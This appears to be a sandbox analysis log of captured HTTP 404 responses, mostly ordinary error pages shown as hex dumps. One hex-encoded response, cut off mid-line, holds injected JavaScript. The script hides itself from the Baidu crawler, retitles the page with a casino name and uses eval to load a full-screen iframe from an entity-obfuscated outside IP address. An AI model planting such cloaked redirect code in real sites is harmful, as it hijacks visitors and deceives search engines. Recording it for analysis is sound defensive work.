      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Dec 2022 14:19:32 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Dec 2022 14:19:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Dec 2022 14:19:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Dec 2022 14:19:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Dec 2022 14:19:44 GMTContent-Type: text/htmlContent-Length: 1741Connection: closeVary: Accept-EncodingETag: "634bbb43-6cd"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 62 61 69 64 75 22 29 20 3d 3d 20 2d 31 29 7b 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 20 3d 22 e6 be b3 e9 97 a8 e9 93 b6 e6 b2 b3 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 34 35 2e 31 32 32 2e 31 33 38 2e 34 35 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 6c 6e 28 27 27 29 3b 76 61 72 20 73 73 3d 27 3c 64 69 76 20 69 64 3d 22 73 68 6f 77 63 6c 6f 6e 65 73 68 65 6e 67 78 69 61 6f 6e 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 22 3e 3c 69 66 72 61 6d 65 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 79 65 73 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 30 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 30 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 77 69 64 74 68 3d 22 31 34 30 30 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 73 72 63 3d 22 26 23 31 30 34 3b 26 23 31 31 36 3b 26 23 31 31 36 3b 26 23 31 31 32 3b 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 30 3b 26 23 35 30 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 31 3b 26 23 35 36 3b 26 23 34 36 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 37 3b 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 64 69 76 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 74 6d 6c 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 20 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 3c 2f 73 74 79 6c 65 3e 27 3b 65 76 61 6c 28 22 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 22 2b 73 73 2b 22 27 29 3b 22 29 3b 74 72 79 7b 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 64 69 76 41 6c 6c 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Dec 2022 14:19:58 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Dec 2022 14:20:00 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Dec 2022 14:20:02 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
